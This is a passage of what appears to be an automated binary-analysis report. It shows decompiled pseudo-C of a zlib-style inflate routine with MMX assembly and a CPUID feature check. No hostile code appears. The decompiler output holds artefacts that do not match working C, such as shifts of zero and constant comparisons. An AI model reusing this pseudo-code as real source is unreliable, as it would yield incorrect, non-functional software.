                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B21BDB9901214EBD370FF69F585A447BFCBB18314F20809EE9089338CE7B869818F59
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 81%
                                                                                                                                                                                        			E01323840() {
                                                                                                                                                                                        				signed int _t162;
                                                                                                                                                                                        				unsigned int _t170;
                                                                                                                                                                                        				unsigned int _t171;
                                                                                                                                                                                        				signed int _t172;
                                                                                                                                                                                        				signed int _t174;
                                                                                                                                                                                        				signed int _t176;
                                                                                                                                                                                        				signed int _t177;
                                                                                                                                                                                        				signed int _t180;
                                                                                                                                                                                        				signed int _t182;
                                                                                                                                                                                        				unsigned int _t183;
                                                                                                                                                                                        				int _t184;
                                                                                                                                                                                        				int _t192;
                                                                                                                                                                                        				signed char _t198;
                                                                                                                                                                                        				signed int _t205;
                                                                                                                                                                                        				signed int _t206;
                                                                                                                                                                                        				signed int _t207;
                                                                                                                                                                                        				int _t208;
                                                                                                                                                                                        				int _t220;
                                                                                                                                                                                        				signed int _t225;
                                                                                                                                                                                        				signed int _t233;
                                                                                                                                                                                        				signed int _t248;
                                                                                                                                                                                        				signed char _t249;
                                                                                                                                                                                        				unsigned int _t250;
                                                                                                                                                                                        				signed char _t251;
                                                                                                                                                                                        				signed int* _t252;
                                                                                                                                                                                        				signed int _t255;
                                                                                                                                                                                        				signed int _t256;
                                                                                                                                                                                        				signed int _t257;
                                                                                                                                                                                        				signed int _t262;
                                                                                                                                                                                        				intOrPtr _t267;
                                                                                                                                                                                        				signed char _t274;
                                                                                                                                                                                        				signed int _t275;
                                                                                                                                                                                        				char* _t276;
                                                                                                                                                                                        				signed int _t278;
                                                                                                                                                                                        				signed char _t280;
                                                                                                                                                                                        				signed int _t283;
                                                                                                                                                                                        				signed int _t287;
                                                                                                                                                                                        				int _t288;
                                                                                                                                                                                        				int _t289;
                                                                                                                                                                                        				int _t292;
                                                                                                                                                                                        				int _t294;
                                                                                                                                                                                        				int _t298;
                                                                                                                                                                                        				signed int _t301;
                                                                                                                                                                                        				signed char _t307;
                                                                                                                                                                                        				signed char _t308;
                                                                                                                                                                                        				signed char _t311;
                                                                                                                                                                                        				signed char _t312;
                                                                                                                                                                                        				signed int _t314;
                                                                                                                                                                                        				int _t315;
                                                                                                                                                                                        				int _t316;
                                                                                                                                                                                        				signed char _t318;
                                                                                                                                                                                        				int _t320;
                                                                                                                                                                                        				int _t322;
                                                                                                                                                                                        				int _t326;
                                                                                                                                                                                        				signed int _t329;
                                                                                                                                                                                        				signed char _t332;
                                                                                                                                                                                        				signed char _t333;
                                                                                                                                                                                        				signed char _t335;
                                                                                                                                                                                        				int _t337;
                                                                                                                                                                                        				signed int _t343;
                                                                                                                                                                                        				int _t345;
                                                                                                                                                                                        				intOrPtr _t346;
                                                                                                                                                                                        				intOrPtr _t347;
                                                                                                                                                                                        				unsigned int _t352;
                                                                                                                                                                                        				unsigned int _t357;
                                                                                                                                                                                        				signed int _t360;
                                                                                                                                                                                        				signed int _t361;
                                                                                                                                                                                        				intOrPtr _t362;
                                                                                                                                                                                        				void* _t363;
                                                                                                                                                                                        				intOrPtr* _t374;
                                                                                                                                                                                        				void* _t375;
                                                                                                                                                                                        				intOrPtr* _t383;
                                                                                                                                                                                        				void* _t384;
                                                                                                                                                                                        				signed int _t389;
                                                                                                                                                                                        				void* _t390;
                                                                                                                                                                                        				signed int _t391;
                                                                                                                                                                                        				void* _t396;
                                                                                                                                                                                        				void* _t398;
                                                                                                                                                                                        				intOrPtr* _t405;
                                                                                                                                                                                        				void* _t406;
                                                                                                                                                                                        				signed int _t407;
                                                                                                                                                                                        				void* _t409;
                                                                                                                                                                                        				intOrPtr* _t416;
                                                                                                                                                                                        				void* _t417;
                                                                                                                                                                                        				unsigned int _t422;
                                                                                                                                                                                        				signed int _t423;
                                                                                                                                                                                        				void* _t425;
                                                                                                                                                                                        				signed int* _t426;
                                                                                                                                                                                        				void* _t430;
                                                                                                                                                                                        
                                                                                                                                                                                        				asm("pushfd");
                                                                                                                                                                                        				_t426 = _t425 - 0x40;
                                                                                                                                                                                        				asm("cld");
                                                                                                                                                                                        				_t389 = _t426[0x16];
                                                                                                                                                                                        				_t362 =  *((intOrPtr*)(_t389 + 0x1c));
                                                                                                                                                                                        				_t162 =  *_t389;
                                                                                                                                                                                        				_t426[0xb] = _t162;
                                                                                                                                                                                        				_t426[5] =  *((intOrPtr*)(_t389 + 4)) + _t162 - 0xb;
                                                                                                                                                                                        				_t267 =  *((intOrPtr*)(_t389 + 0x10));
                                                                                                                                                                                        				_t248 =  *(_t389 + 0xc);
                                                                                                                                                                                        				_t426[0xf] = _t248;
                                                                                                                                                                                        				_t426[0xa] =  ~(_t426[0x17] - _t267) + _t248;
                                                                                                                                                                                        				_t426[4] = _t267 - 0x101 + _t248;
                                                                                                                                                                                        				_t426[2] =  *(_t362 + 0x4c);
                                                                                                                                                                                        				_t426[3] =  *(_t362 + 0x50);
                                                                                                                                                                                        				 *_t426 = (1 <<  *(_t362 + 0x54)) - 1;
                                                                                                                                                                                        				_t426[1] = (1 <<  *(_t362 + 0x58)) - 1;
                                                                                                                                                                                        				_t170 =  *(_t362 + 0x28);
                                                                                                                                                                                        				_t343 =  *(_t362 + 0x34);
                                                                                                                                                                                        				_t426[0xd] = _t170;
                                                                                                                                                                                        				_t426[0xc] =  *(_t362 + 0x30);
                                                                                                                                                                                        				_t426[0xe] = _t343;
                                                                                                                                                                                        				_t422 =  *(_t362 + 0x38);
                                                                                                                                                                                        				_t249 =  *(_t362 + 0x3c);
                                                                                                                                                                                        				_t390 = _t426[0xb];
                                                                                                                                                                                        				_t274 = _t426[5];
                                                                                                                                                                                        				if(_t274 > _t390) {
                                                                                                                                                                                        					L2:
                                                                                                                                                                                        					if((_t390 & 0x00000003) != 0) {
                                                                                                                                                                                        						_t390 = _t390 + 1;
                                                                                                                                                                                        						_t274 = _t249;
                                                                                                                                                                                        						_t249 = _t249 + 8;
                                                                                                                                                                                        						_t170 = 0 << _t274;
                                                                                                                                                                                        						_t422 = _t422 | _t170;
                                                                                                                                                                                        						goto L2;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					goto L4;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					_t337 = _t274 + 0xb - _t390;
                                                                                                                                                                                        					_t170 = memset(_t390 + _t337 + _t337, 0, memcpy( &(_t426[7]), _t390, _t337) << 0);
                                                                                                                                                                                        					_t426 =  &(_t426[6]);
                                                                                                                                                                                        					_t274 = 0;
                                                                                                                                                                                        					_t390 =  &(_t426[7]);
                                                                                                                                                                                        					_t426[5] = _t390;
                                                                                                                                                                                        					L4:
                                                                                                                                                                                        					_t363 = _t426[0xf];
                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                        						_t430 =  *0x1328010 - 2;
                                                                                                                                                                                        						if(_t430 == 0) {
                                                                                                                                                                                        							break;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						if(_t430 > 0) {
                                                                                                                                                                                        							do {
                                                                                                                                                                                        								if(_t249 <= 0xf) {
                                                                                                                                                                                        									asm("lodsw");
                                                                                                                                                                                        									_t318 = _t249;
                                                                                                                                                                                        									_t249 = _t249 + 0x10;
                                                                                                                                                                                        									_t422 = _t423 | 0 << _t318;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								_t171 =  *(_t426[2] + ( *_t426 & _t422) * 4);
                                                                                                                                                                                        								while(1) {
                                                                                                                                                                                        									_t250 = _t249 - _t171;
                                                                                                                                                                                        									_t423 = _t422 >> _t171;
                                                                                                                                                                                        									if(_t171 == 0) {
                                                                                                                                                                                        										asm("stosb");
                                                                                                                                                                                        										goto L22;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									_t352 = _t171 >> 0x10;
                                                                                                                                                                                        									_t307 = _t171;
                                                                                                                                                                                        									if((_t171 & 0x00000010) == 0) {
                                                                                                                                                                                        										if((_t171 & 0x00000040) != 0) {
                                                                                                                                                                                        											L97:
                                                                                                                                                                                        											if((_t171 & 0x00000020) == 0) {
                                                                                                                                                                                        												_t276 = "invalid literal/length code";
                                                                                                                                                                                        												_t346 = 0x1a;
                                                                                                                                                                                        											} else {
                                                                                                                                                                                        												_t276 = 0;
                                                                                                                                                                                        												_t346 = 0xb;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											L101:
                                                                                                                                                                                        											_t172 = _t426[0x16];
                                                                                                                                                                                        											if(_t276 != 0) {
                                                                                                                                                                                        												 *(_t172 + 0x18) = _t276;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											 *((intOrPtr*)( *((intOrPtr*)(_t172 + 0x1c)))) = _t346;
                                                                                                                                                                                        											goto L104;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										_t171 =  *(_t426[2] + (((0x00000001 << _t307) - 0x00000001 & _t423) + _t352) * 4);
                                                                                                                                                                                        										continue;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									_t308 = _t307 & 0x0000000f;
                                                                                                                                                                                        									if(_t308 != 0) {
                                                                                                                                                                                        										if(_t250 < _t308) {
                                                                                                                                                                                        											asm("lodsw");
                                                                                                                                                                                        											_t335 = _t250;
                                                                                                                                                                                        											_t250 = _t250 + 0x10;
                                                                                                                                                                                        											_t423 = _t423 | 0 << _t335;
                                                                                                                                                                                        											_t308 = _t335;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										_t250 = _t250 - _t308;
                                                                                                                                                                                        										_t233 = (0x00000001 << _t308) - 0x00000001 & _t423;
                                                                                                                                                                                        										_t423 = _t423 >> _t308;
                                                                                                                                                                                        										_t352 = _t352 + _t233;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									_t426[6] = _t352;
                                                                                                                                                                                        									if(_t250 <= 0xf) {
                                                                                                                                                                                        										asm("lodsw");
                                                                                                                                                                                        										_t333 = _t250;
                                                                                                                                                                                        										_t250 = _t250 + 0x10;
                                                                                                                                                                                        										_t423 = _t423 | 0 << _t333;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									_t198 =  *(_t426[3] + (_t426[1] & _t423) * 4);
                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                        										_t357 = _t198 >> 0x10;
                                                                                                                                                                                        										_t250 = _t250 - _t198;
                                                                                                                                                                                        										_t423 = _t423 >> _t198;
                                                                                                                                                                                        										_t311 = _t198;
                                                                                                                                                                                        										if((_t198 & 0x00000010) != 0) {
                                                                                                                                                                                        											break;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										if((_t198 & 0x00000040) != 0) {
                                                                                                                                                                                        											L96:
                                                                                                                                                                                        											_t276 = "invalid distance code";
                                                                                                                                                                                        											_t346 = 0x1a;
                                                                                                                                                                                        											goto L101;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										_t198 =  *(_t426[3] + (((0x00000001 << _t311) - 0x00000001 & _t423) + _t357) * 4);
                                                                                                                                                                                        									}
                                                                                                                                                                                        									_t312 = _t311 & 0x0000000f;
                                                                                                                                                                                        									if(_t312 == 0) {
                                                                                                                                                                                        										if(_t357 != 1 || _t426[0xa] == _t363) {
                                                                                                                                                                                        											L38:
                                                                                                                                                                                        											_t426[0xb] = _t390;
                                                                                                                                                                                        											_t205 = _t363 - _t426[0xa];
                                                                                                                                                                                        											if(_t205 < _t357) {
                                                                                                                                                                                        												_t206 = _t426[0xd];
                                                                                                                                                                                        												_t314 =  ~_t205;
                                                                                                                                                                                        												_t407 = _t426[0xe];
                                                                                                                                                                                        												if(_t206 < _t357) {
                                                                                                                                                                                        													L100:
                                                                                                                                                                                        													_t390 = _t426[0xb];
                                                                                                                                                                                        													_t276 = "invalid distance too far back";
                                                                                                                                                                                        													_t346 = 0x1a;
                                                                                                                                                                                        													goto L101;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												_t315 = _t314 + _t357;
                                                                                                                                                                                        												if(_t426[0xc] != 0) {
                                                                                                                                                                                        													_t207 = _t426[0xc];
                                                                                                                                                                                        													if(_t315 <= _t207) {
                                                                                                                                                                                        														_t409 = _t407 + _t207 - _t315;
                                                                                                                                                                                        														_t208 = _t426[6];
                                                                                                                                                                                        														if(_t208 > _t315) {
                                                                                                                                                                                        															_t208 = memcpy(_t363, _t409, _t315);
                                                                                                                                                                                        															_t426 =  &(_t426[3]);
                                                                                                                                                                                        															_t363 = _t409 + _t315 + _t315;
                                                                                                                                                                                        															_t409 = _t363 - _t357;
                                                                                                                                                                                        														}
                                                                                                                                                                                        													} else {
                                                                                                                                                                                        														_t409 = _t407 + _t426[0xd] + _t207 - _t315;
                                                                                                                                                                                        														_t320 = _t315 - _t207;
                                                                                                                                                                                        														_t208 = _t426[6];
                                                                                                                                                                                        														if(_t208 > _t320) {
                                                                                                                                                                                        															_t208 = memcpy(_t363, _t409, _t320);
                                                                                                                                                                                        															_t426 =  &(_t426[3]);
                                                                                                                                                                                        															_t363 = _t409 + _t320 + _t320;
                                                                                                                                                                                        															_t409 = _t426[0xe];
                                                                                                                                                                                        															_t322 = _t426[0xc];
                                                                                                                                                                                        															if(_t208 > _t322) {
                                                                                                                                                                                        																_t208 = memcpy(_t363, _t409, _t322);
                                                                                                                                                                                        																_t426 =  &(_t426[3]);
                                                                                                                                                                                        																_t363 = _t409 + _t322 + _t322;
                                                                                                                                                                                        																_t409 = _t363 - _t357;
                                                                                                                                                                                        															}
                                                                                                                                                                                        														}
                                                                                                                                                                                        													}
                                                                                                                                                                                        												} else {
                                                                                                                                                                                        													_t409 = _t407 + _t206 - _t315;
                                                                                                                                                                                        													_t208 = _t426[6];
                                                                                                                                                                                        													if(_t208 > _t315) {
                                                                                                                                                                                        														_t208 = memcpy(_t363, _t409, _t315);
                                                                                                                                                                                        														_t426 =  &(_t426[3]);
                                                                                                                                                                                        														_t363 = _t409 + _t315 + _t315;
                                                                                                                                                                                        														_t409 = _t363 - _t357;
                                                                                                                                                                                        													}
                                                                                                                                                                                        												}
                                                                                                                                                                                        												_t316 = _t208;
                                                                                                                                                                                        												memcpy(_t363, _t409, _t316);
                                                                                                                                                                                        												_t426 =  &(_t426[3]);
                                                                                                                                                                                        												_t363 = _t409 + _t316 + _t316;
                                                                                                                                                                                        												_t390 = _t426[0xb];
                                                                                                                                                                                        												goto L22;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											_t416 = _t363 - _t357;
                                                                                                                                                                                        											_t326 = _t426[6] - 3;
                                                                                                                                                                                        											 *_t363 =  *_t416;
                                                                                                                                                                                        											_t417 = _t416 + 3;
                                                                                                                                                                                        											 *((char*)(_t363 + 1)) =  *((intOrPtr*)(_t416 + 1));
                                                                                                                                                                                        											 *((char*)(_t363 + 2)) =  *((intOrPtr*)(_t416 + 2));
                                                                                                                                                                                        											memcpy(_t363 + 3, _t417, _t326);
                                                                                                                                                                                        											_t426 =  &(_t426[3]);
                                                                                                                                                                                        											_t363 = _t417 + _t326 + _t326;
                                                                                                                                                                                        											_t390 = _t426[0xb];
                                                                                                                                                                                        										} else {
                                                                                                                                                                                        											_t383 = _t363 - 1;
                                                                                                                                                                                        											_t220 =  *_t383;
                                                                                                                                                                                        											_t329 = _t426[6] - 3;
                                                                                                                                                                                        											 *(_t383 + 1) = _t220;
                                                                                                                                                                                        											 *(_t383 + 2) = _t220;
                                                                                                                                                                                        											 *(_t383 + 3) = _t220;
                                                                                                                                                                                        											_t384 = _t383 + 4;
                                                                                                                                                                                        											memset(_t384, _t220, _t329 << 0);
                                                                                                                                                                                        											_t426 =  &(_t426[3]);
                                                                                                                                                                                        											_t363 = _t384 + _t329;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L22;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									if(_t250 < _t312) {
                                                                                                                                                                                        										asm("lodsw");
                                                                                                                                                                                        										_t332 = _t250;
                                                                                                                                                                                        										_t250 = _t250 + 0x10;
                                                                                                                                                                                        										_t423 = _t423 | 0 << _t332;
                                                                                                                                                                                        										_t312 = _t332;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									_t250 = _t250 - _t312;
                                                                                                                                                                                        									_t225 = (0x00000001 << _t312) - 0x00000001 & _t423;
                                                                                                                                                                                        									_t423 = _t423 >> _t312;
                                                                                                                                                                                        									_t357 = _t357 + _t225;
                                                                                                                                                                                        									goto L38;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								L22:
                                                                                                                                                                                        							} while (_t426[4] > _t363 && _t426[5] > _t390);
                                                                                                                                                                                        							L104:
                                                                                                                                                                                        							if( *0x1328010 == 2) {
                                                                                                                                                                                        								_t250 = _t423;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t174 = _t426[0x16];
                                                                                                                                                                                        							_t347 =  *((intOrPtr*)(_t174 + 0x1c));
                                                                                                                                                                                        							_t278 = _t250 >> 3;
                                                                                                                                                                                        							_t391 = _t390 - _t278;
                                                                                                                                                                                        							_t251 = _t250 - (_t278 << 3);
                                                                                                                                                                                        							 *(_t174 + 0xc) = _t363;
                                                                                                                                                                                        							 *(_t347 + 0x3c) = _t251;
                                                                                                                                                                                        							_t280 = _t251;
                                                                                                                                                                                        							_t252 =  &(_t426[7]);
                                                                                                                                                                                        							if(_t426[5] == _t252) {
                                                                                                                                                                                        								_t262 =  *_t174;
                                                                                                                                                                                        								_t426[5] = _t262;
                                                                                                                                                                                        								_t391 = _t391 - _t252 + _t262;
                                                                                                                                                                                        								_t426[5] = _t426[5] +  *((intOrPtr*)(_t174 + 4)) - 0xb;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							 *_t174 = _t391;
                                                                                                                                                                                        							_t255 = (1 << _t280) - 1;
                                                                                                                                                                                        							if( *0x1328010 == 2) {
                                                                                                                                                                                        								asm("psrlq mm0, mm1");
                                                                                                                                                                                        								asm("movd ebp, mm0");
                                                                                                                                                                                        								asm("emms");
                                                                                                                                                                                        							}
                                                                                                                                                                                        							 *(_t347 + 0x38) = _t423 & _t255;
                                                                                                                                                                                        							_t256 = _t426[5];
                                                                                                                                                                                        							if(_t256 <= _t391) {
                                                                                                                                                                                        								 *((intOrPtr*)(_t174 + 4)) =  ~(_t391 - _t256) + 0xb;
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								 *((intOrPtr*)(_t174 + 4)) = _t256 - _t391 + 0xb;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t257 = _t426[4];
                                                                                                                                                                                        							if(_t257 <= _t363) {
                                                                                                                                                                                        								 *((intOrPtr*)(_t174 + 0x10)) =  ~(_t363 - _t257) + 0x101;
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								 *((intOrPtr*)(_t174 + 0x10)) = _t257 - _t363 + 0x101;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							asm("popfd");
                                                                                                                                                                                        							return _t174;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_push(_t170);
                                                                                                                                                                                        						_push(_t249);
                                                                                                                                                                                        						_push(_t274);
                                                                                                                                                                                        						_push(_t343);
                                                                                                                                                                                        						asm("pushfd");
                                                                                                                                                                                        						 *_t426 =  *_t426 ^ 0x00200000;
                                                                                                                                                                                        						asm("popfd");
                                                                                                                                                                                        						asm("pushfd");
                                                                                                                                                                                        						_pop(_t360);
                                                                                                                                                                                        						_t361 = _t360 ^  *_t426;
                                                                                                                                                                                        						if(_t361 == 0) {
                                                                                                                                                                                        							L15:
                                                                                                                                                                                        							 *0x1328010 = 3;
                                                                                                                                                                                        							L16:
                                                                                                                                                                                        							_pop(_t343);
                                                                                                                                                                                        							_pop(_t274);
                                                                                                                                                                                        							_pop(_t249);
                                                                                                                                                                                        							_pop(_t170);
                                                                                                                                                                                        							continue;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						asm("cpuid");
                                                                                                                                                                                        						if(_t249 != 0x756e6547 || _t274 != 0x6c65746e || _t361 != 0x49656e69) {
                                                                                                                                                                                        							goto L15;
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							asm("cpuid");
                                                                                                                                                                                        							if(0xd != 6 || (_t361 & 0x00800000) == 0) {
                                                                                                                                                                                        								goto L15;
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								 *0x1328010 = 2;
                                                                                                                                                                                        								goto L16;
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					asm("emms");
                                                                                                                                                                                        					asm("movd mm0, ebp");
                                                                                                                                                                                        					_t423 = _t249;
                                                                                                                                                                                        					asm("movd mm4, dword [esp]");
                                                                                                                                                                                        					asm("movq mm3, mm4");
                                                                                                                                                                                        					asm("movd mm5, dword [esp+0x4]");
                                                                                                                                                                                        					asm("movq mm2, mm5");
                                                                                                                                                                                        					asm("pxor mm1, mm1");
                                                                                                                                                                                        					_t250 = _t426[2];
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						asm("psrlq mm0, mm1");
                                                                                                                                                                                        						if(_t423 <= 0x20) {
                                                                                                                                                                                        							asm("movd mm6, ebp");
                                                                                                                                                                                        							asm("movd mm7, dword [esi]");
                                                                                                                                                                                        							_t390 = _t390 + 4;
                                                                                                                                                                                        							asm("psllq mm7, mm6");
                                                                                                                                                                                        							_t423 = _t423 + 0x20;
                                                                                                                                                                                        							asm("por mm0, mm7");
                                                                                                                                                                                        						}
                                                                                                                                                                                        						asm("pand mm4, mm0");
                                                                                                                                                                                        						asm("movd eax, mm4");
                                                                                                                                                                                        						asm("movq mm4, mm3");
                                                                                                                                                                                        						_t171 =  *(_t250 + _t170 * 4);
                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                        							_t275 = _t171 & 0x000000ff;
                                                                                                                                                                                        							asm("movd mm1, ecx");
                                                                                                                                                                                        							_t423 = _t423 - _t275;
                                                                                                                                                                                        							if(_t171 == 0) {
                                                                                                                                                                                        								break;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t345 = _t171 >> 0x10;
                                                                                                                                                                                        							if((_t171 & 0x00000010) == 0) {
                                                                                                                                                                                        								if((_t171 & 0x00000040) != 0) {
                                                                                                                                                                                        									goto L97;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								asm("psrlq mm0, mm1");
                                                                                                                                                                                        								asm("movd ecx, mm0");
                                                                                                                                                                                        								_t171 =  *(_t250 + ((_t275 &  *(0x13237bc + (_t171 & 0x0000000f) * 4)) + _t345) * 4);
                                                                                                                                                                                        								continue;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t176 = _t171 & 0x0000000f;
                                                                                                                                                                                        							if(_t176 != 0) {
                                                                                                                                                                                        								asm("psrlq mm0, mm1");
                                                                                                                                                                                        								asm("movd mm1, eax");
                                                                                                                                                                                        								asm("movd ecx, mm0");
                                                                                                                                                                                        								_t423 = _t423 - _t176;
                                                                                                                                                                                        								_t345 = _t345 + (_t275 &  *(0x13237bc + _t176 * 4));
                                                                                                                                                                                        							}
                                                                                                                                                                                        							asm("psrlq mm0, mm1");
                                                                                                                                                                                        							if(_t423 <= 0x20) {
                                                                                                                                                                                        								asm("movd mm6, ebp");
                                                                                                                                                                                        								asm("movd mm7, dword [esi]");
                                                                                                                                                                                        								_t390 = _t390 + 4;
                                                                                                                                                                                        								asm("psllq mm7, mm6");
                                                                                                                                                                                        								_t423 = _t423 + 0x20;
                                                                                                                                                                                        								asm("por mm0, mm7");
                                                                                                                                                                                        							}
                                                                                                                                                                                        							asm("pand mm5, mm0");
                                                                                                                                                                                        							asm("movd eax, mm5");
                                                                                                                                                                                        							asm("movq mm5, mm2");
                                                                                                                                                                                        							_t177 =  *(_t426[3] + _t176 * 4);
                                                                                                                                                                                        							while(1) {
                                                                                                                                                                                        								_t283 = _t177 & 0x000000ff;
                                                                                                                                                                                        								_t250 = _t177 >> 0x10;
                                                                                                                                                                                        								_t423 = _t423 - _t283;
                                                                                                                                                                                        								asm("movd mm1, ecx");
                                                                                                                                                                                        								if((_t177 & 0x00000010) != 0) {
                                                                                                                                                                                        									break;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								if((_t177 & 0x00000040) != 0) {
                                                                                                                                                                                        									goto L96;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								asm("psrlq mm0, mm1");
                                                                                                                                                                                        								asm("movd ecx, mm0");
                                                                                                                                                                                        								_t177 =  *(_t426[3] + ((_t283 &  *(0x13237bc + (_t177 & 0x0000000f) * 4)) + _t250) * 4);
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t180 = _t177 & 0x0000000f;
                                                                                                                                                                                        							if(_t180 == 0) {
                                                                                                                                                                                        								if(_t250 != 1 || _t426[0xa] == _t363) {
                                                                                                                                                                                        									L76:
                                                                                                                                                                                        									_t426[0xb] = _t390;
                                                                                                                                                                                        									_t182 = _t363 - _t426[0xa];
                                                                                                                                                                                        									if(_t182 < _t250) {
                                                                                                                                                                                        										_t183 = _t426[0xd];
                                                                                                                                                                                        										_t287 =  ~_t182;
                                                                                                                                                                                        										_t396 = _t426[0xe];
                                                                                                                                                                                        										if(_t183 < _t250) {
                                                                                                                                                                                        											goto L100;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										_t288 = _t287 + _t250;
                                                                                                                                                                                        										if(_t426[0xc] != 0) {
                                                                                                                                                                                        											_t184 = _t426[0xc];
                                                                                                                                                                                        											if(_t288 <= _t184) {
                                                                                                                                                                                        												_t398 = _t396 + _t184 - _t288;
                                                                                                                                                                                        												if(_t345 > _t288) {
                                                                                                                                                                                        													_t345 = _t345 - _t288;
                                                                                                                                                                                        													memcpy(_t363, _t398, _t288);
                                                                                                                                                                                        													_t426 =  &(_t426[3]);
                                                                                                                                                                                        													_t363 = _t398 + _t288 + _t288;
                                                                                                                                                                                        													_t398 = _t363 - _t250;
                                                                                                                                                                                        												}
                                                                                                                                                                                        											} else {
                                                                                                                                                                                        												_t398 = _t396 + _t426[0xd] + _t184 - _t288;
                                                                                                                                                                                        												_t292 = _t288 - _t184;
                                                                                                                                                                                        												if(_t345 > _t292) {
                                                                                                                                                                                        													_t345 = _t345 - _t292;
                                                                                                                                                                                        													memcpy(_t363, _t398, _t292);
                                                                                                                                                                                        													_t426 =  &(_t426[3]);
                                                                                                                                                                                        													_t363 = _t398 + _t292 + _t292;
                                                                                                                                                                                        													_t398 = _t426[0xe];
                                                                                                                                                                                        													_t294 = _t426[0xc];
                                                                                                                                                                                        													if(_t345 > _t294) {
                                                                                                                                                                                        														_t345 = _t345 - _t294;
                                                                                                                                                                                        														memcpy(_t363, _t398, _t294);
                                                                                                                                                                                        														_t426 =  &(_t426[3]);
                                                                                                                                                                                        														_t363 = _t398 + _t294 + _t294;
                                                                                                                                                                                        														_t398 = _t363 - _t250;
                                                                                                                                                                                        													}
                                                                                                                                                                                        												}
                                                                                                                                                                                        											}
                                                                                                                                                                                        										} else {
                                                                                                                                                                                        											_t398 = _t396 + _t183 - _t288;
                                                                                                                                                                                        											if(_t345 > _t288) {
                                                                                                                                                                                        												_t345 = _t345 - _t288;
                                                                                                                                                                                        												memcpy(_t363, _t398, _t288);
                                                                                                                                                                                        												_t426 =  &(_t426[3]);
                                                                                                                                                                                        												_t363 = _t398 + _t288 + _t288;
                                                                                                                                                                                        												_t398 = _t363 - _t250;
                                                                                                                                                                                        											}
                                                                                                                                                                                        										}
                                                                                                                                                                                        										_t289 = _t345;
                                                                                                                                                                                        										_t170 = memcpy(_t363, _t398, _t289);
                                                                                                                                                                                        										_t426 =  &(_t426[3]);
                                                                                                                                                                                        										_t363 = _t398 + _t289 + _t289;
                                                                                                                                                                                        										_t390 = _t426[0xb];
                                                                                                                                                                                        										_t250 = _t426[2];
                                                                                                                                                                                        										goto L64;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									_t405 = _t363 - _t250;
                                                                                                                                                                                        									_t298 = _t345 - 3;
                                                                                                                                                                                        									 *_t363 =  *_t405;
                                                                                                                                                                                        									_t406 = _t405 + 3;
                                                                                                                                                                                        									 *((char*)(_t363 + 1)) =  *((intOrPtr*)(_t405 + 1));
                                                                                                                                                                                        									 *((char*)(_t363 + 2)) =  *((intOrPtr*)(_t405 + 2));
                                                                                                                                                                                        									_t170 = memcpy(_t363 + 3, _t406, _t298);
                                                                                                                                                                                        									_t426 =  &(_t426[3]);
                                                                                                                                                                                        									_t363 = _t406 + _t298 + _t298;
                                                                                                                                                                                        									_t390 = _t426[0xb];
                                                                                                                                                                                        									_t250 = _t426[2];
                                                                                                                                                                                        									goto L64;
                                                                                                                                                                                        								} else {
                                                                                                                                                                                        									_t374 = _t363 - 1;
                                                                                                                                                                                        									_t192 =  *_t374;
                                                                                                                                                                                        									_t301 = _t345 - 3;
                                                                                                                                                                                        									 *(_t374 + 1) = _t192;
                                                                                                                                                                                        									 *(_t374 + 2) = _t192;
                                                                                                                                                                                        									 *(_t374 + 3) = _t192;
                                                                                                                                                                                        									_t375 = _t374 + 4;
                                                                                                                                                                                        									_t170 = memset(_t375, _t192, _t301 << 0);
                                                                                                                                                                                        									_t426 =  &(_t426[3]);
                                                                                                                                                                                        									_t363 = _t375 + _t301;
                                                                                                                                                                                        									_t250 = _t426[2];
                                                                                                                                                                                        									L64:
                                                                                                                                                                                        									if(_t426[4] <= _t363) {
                                                                                                                                                                                        										goto L104;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									goto L65;
                                                                                                                                                                                        								}
                                                                                                                                                                                        							}
                                                                                                                                                                                        							asm("psrlq mm0, mm1");
                                                                                                                                                                                        							asm("movd mm1, eax");
                                                                                                                                                                                        							asm("movd ecx, mm0");
                                                                                                                                                                                        							_t423 = _t423 - _t180;
                                                                                                                                                                                        							_t250 = _t250 + (_t283 &  *(0x13237bc + _t180 * 4));
                                                                                                                                                                                        							goto L76;
                                                                                                                                                                                        						}
